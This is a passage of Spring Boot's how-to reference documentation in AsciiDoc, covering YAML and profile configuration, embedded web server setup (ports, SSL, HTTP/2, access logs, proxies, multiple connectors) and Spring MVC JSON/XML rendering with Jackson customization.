9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). 
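\n\nIf you declare the dependency yourself, the Maven declaration looks as follows (no version is needed when you use the `spring-boot-starter-parent`, as it is managed by Spring Boot):\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.yaml<\/groupId>\n\t\t<artifactId>snakeyaml<\/artifactId>\n\t<\/dependency>\n----\n\n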
A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-${profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. 
There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. 
Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you need to include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behaviour configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. (Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. 
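\n\nFor example, the following sketch (with a hypothetical `ServerPortHolder` bean) captures the port once the server has started:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class ServerPortHolder\n\t\t\timplements ApplicationListener<ServletWebServerInitializedEvent> {\n\n\t\tprivate volatile int port;\n\n\t\t@Override\n\t\tpublic void onApplicationEvent(ServletWebServerInitializedEvent event) {\n\t\t\t\/\/ The event exposes the fully initialized WebServer, including its port\n\t\t\tthis.port = event.getWebServer().getPort();\n\t\t}\n\n\t\tpublic int getPort() {\n\t\t\treturn this.port;\n\t\t}\n\n\t}\n----\n\n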
The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. 
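\n\nFor example, in `application.properties`:\n\n[source,properties,indent=0]\n----\n\tserver.http2.enabled=true\n----\n\n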
This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout of the box by JDK 8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. So you\nmust <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0, HTTP\/2 is supported without any additional requirements on JDK 8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x, which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are installed on the host operating system.\n\nThe library folder must be made available, if not already, to the JVM library path. You\ncan do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. See the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation] for more details.\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-starter-webflux` uses Reactor Netty as its default server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. Developers can choose to import only the required dependencies using\na classifier (see http:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customize your web server by adding new entries in your `application.properties` (or\n`application.yml`, or the environment; see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections already covered many common use cases, such as compression, SSL\nor HTTP\/2. 
However, if a configuration key doesn't exist for your use case, you should\nthen look at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, like connectors, server resources, or the server itself - all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will\noverride the one provided by Spring Boot. In this case, you can't rely on configuration\nproperties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. 
This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.directory` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. 
For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. 
If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. 
To switch to the `LegacyCookieProcessor`, use a
`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown
in the following example:

[source,java,indent=0]
----
include::{code-examples}/context/embedded/TomcatLegacyCookieProcessorExample.java[tag=customizer]
----



[[howto-enable-multiple-listeners-in-undertow]]
=== Enable Multiple Listeners with Undertow
Add an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and
add a listener to the `Builder`, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public UndertowServletWebServerFactory servletWebServerFactory() {
		UndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();
		factory.addBuilderCustomizers(new UndertowBuilderCustomizer() {

			@Override
			public void customize(Builder builder) {
				builder.addHttpListener(8080, "0.0.0.0");
			}

		});
		return factory;
	}
----



[[howto-create-websocket-endpoints-using-serverendpoint]]
=== Create WebSocket Endpoints Using @ServerEndpoint
If you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded
container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the
following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public ServerEndpointExporter serverEndpointExporter() {
		return new ServerEndpointExporter();
	}
----

The bean shown in the preceding example registers any `@ServerEndpoint` annotated beans
with the underlying WebSocket container. When deployed to a standalone servlet container,
this role is performed by a servlet container initializer, and the
`ServerEndpointExporter` bean is not required.



[[howto-spring-mvc]]
== Spring MVC

Spring Boot has a number of starters that include Spring MVC. Note that some starters
include a dependency on Spring MVC rather than including it directly. This section answers
common questions about Spring MVC and Spring Boot.

[[howto-write-a-json-rest-service]]
=== Write a JSON REST Service
Any Spring `@RestController` in a Spring Boot application should render JSON responses by
default as long as Jackson2 is on the classpath, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@RestController
	public class MyController {

		@RequestMapping("/thing")
		public MyThing thing() {
			return new MyThing();
		}

	}
----

As long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy
object), then `http://localhost:8080/thing` serves a JSON representation of it by
default. Note that, in a browser, you might sometimes see XML responses, because browsers
tend to send accept headers that prefer XML.



[[howto-write-an-xml-rest-service]]
=== Write an XML REST Service
If you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you
can use it to render XML responses. The previous example that we used for JSON would
work.
To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) is\nused, with the additional requirement of having `MyThing` annotated as\n`@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. 
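For example, the following sketch shows the general shape of such a customizer
(enabling `INDENT_OUTPUT` here is purely illustrative; any builder method can be called):

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public Jackson2ObjectMapperBuilderCustomizer jacksonBuilderCustomizer() {
		// purely illustrative: enable pretty-printing on the auto-configured builder
		return (builder) -> builder.featuresToEnable(SerializationFeature.INDENT_OUTPUT);
	}
----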
